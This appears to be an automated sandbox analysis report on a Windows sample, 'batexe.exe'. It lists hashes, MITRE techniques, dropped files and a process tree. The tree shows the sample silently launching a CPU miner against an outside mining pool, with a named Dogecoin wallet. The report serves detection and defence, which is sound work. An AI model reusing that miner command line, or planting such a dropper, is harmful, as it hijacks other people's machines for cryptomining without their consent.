73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 07:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4092	b2e.exe
3372	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4916-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4916 wrote to memory of 4092	4916	batexe.exe	84
PID 4916 wrote to memory of 4092	4916	batexe.exe	84
PID 4916 wrote to memory of 4092	4916	batexe.exe	84
PID 4092 wrote to memory of 644	4092	b2e.exe	85
PID 4092 wrote to memory of 644	4092	b2e.exe	85
PID 4092 wrote to memory of 644	4092	b2e.exe	85
PID 644 wrote to memory of 3372	644	cmd.exe	88
PID 644 wrote to memory of 3372	644	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Users\Admin\AppData\Local\Temp\7376.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7376.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7376.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85C5.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:644
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7376.tmp\b2e.exe

Filesize
1.8MB

MD5
58e8dce34aaf9c8f1bbe8cd0b5f6077d

SHA1
47da3a3ec5e09c64b18eec7e5b8614ed616d6b14

SHA256
186a043ab3064e6dc6064947fdb5d7cc52048e0b3bff36522f79342286068c22

SHA512
6eb915cd9390aa8ca0c6bf3e89d396dc9bf309e1ee6cc837cdca50559f811f0876c473c9ce5eb0e8f6d262b8d5eace055341cb4ea7db4f7097b00df9e8ee9572

Download Submit
C:\Users\Admin\AppData\Local\Temp\7376.tmp\b2e.exe

Filesize
1.8MB

MD5
8b1dbb76c2d50771f24ad8aa9b228f7e

SHA1
074ff4968bcf207065a386a21f27949f74f8ea19

SHA256
ef02ae4b19baa53c5da872b336786a20b8ee50d045fa15abe94a6b154e8123c8

SHA512
195077e19e5b26c632839157c8af25602b855af93ef525a236a2ca0e72607ad03ad95a3045e820ca3b496317ebb96180972a3fa169a9666348878a2fae3cab59

Download Submit
C:\Users\Admin\AppData\Local\Temp\7376.tmp\b2e.exe

Filesize
1.9MB

MD5
518dd28063b6723c992cd03516f1127c

SHA1
180b84df0b9cf83f7c996ff3489f72ba5df1927e

SHA256
d2bb5d251aa0243248f452a98f1bef587f5a36713da7cac7107237232959de66

SHA512
aefacb928bf26c68dae9e9337af63b5498a029a89bad5f62f19b20427708a6d1791557039a50f4401d91565d77937d173b20f5769c8b98dc902dbcc5f278fbcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\85C5.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
15KB

MD5
8a810af910309af2e2c4d6d351355c24

SHA1
b2b4ea69f6ecfefae04294a99eee012489ea92bf

SHA256
6403005ac6a0d7dea8820a2c1825692223c29b24cbeffe9831b2084a6e336861

SHA512
98b49a720279aa59838d9dae4494e73c71246d37e8c6f2312687cee944c0e41fcc69c8e11c3e3e72dc5a5440488528976a3e74987bb773969d421f9e26036abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
30KB

MD5
553f55040be9b11cb42d9d003b736afd

SHA1
055a002c2c9926676e43f5f1df9eaaede72315af

SHA256
f3902e91dde6f752f7f3c31ccd003068c60aa2543ae81c0cf28e73667c5bb495

SHA512
e17ceb55e11e6f9d15ad51dac12ff26794f0f325457168659d9c3784ec27b34b6d815fa49c2da6bf9e6d8e866903e94cb216da0f23eb59a63a462051b9599b24

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
e9811291a0e4c4e7e5cbb22231643bdb

SHA1
d0360a427f5a26461694e57365cace51d7e1257a

SHA256
b417346f31a0aa282ae784dfe2fb477e95226a108e13f3fe5dbc5011e54ff517

SHA512
1f7120dc56dcc059f83aa2398bc64b0ca5b4488791fe0c4d61ce867b3f167496941d5bb1b1ae5d93319fc06f9b1e2f61481b95c30159748a015456c4c4356186

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
1ec4176f04d4c47ace6367300cd25fac

SHA1
8633df1360f0544f1f64a57bd879ffb5aec9b124

SHA256
396e23b550cb24c2df1cf3ae23ce8a9ce60642282aa38bde171711e530098222

SHA512
6a734d84759c11a0735eac4d498054b7bc755ca5aaf1de24c5d5f653037f840cdffec3b8b2d67e530e161de31e1a4336573f9156841e05d2a70707ccae7429c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
871KB

MD5
ee223f452439f347bf1ee0f0b05b3039

SHA1
edf70c49929e11f3a09ef8fd40512e028b175572

SHA256
b9b3572b17d063bfd97b90de4cb318fe3dd1a796f8a115a459727682f5139c27

SHA512
114cfac411b886818c27da2faf9c4bcd55f046df8010e30a9076d97763dadc8b33ea112b7a65d17c4cb2b98a3a936e77a16c40c33cb777d727fea4a21a8db0cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
865KB

MD5
60c8911f62b01ab47f5e67cf4a29f527

SHA1
a26c89ad5f385f9766c6353d24a5135478842359

SHA256
ee905a8286692f1c66c7efa3f999a7a7e67e137bd3c12a1359d93f66007789bd

SHA512
2edb33a1fbd3d0bcbc412f05c1b4d864746c542bfc69a9999ed7c30afebcd4b7fb5a912deead56a95ace98a3be0df14ae3b08945bfbe16adf2dae6f73fa32587

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3372-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/3372-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3372-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-42-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/3372-48-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/3372-49-0x00000000744D0000-0x0000000074568000-memory.dmp

Filesize
608KB

Download
memory/3372-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4092-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4092-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4916-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download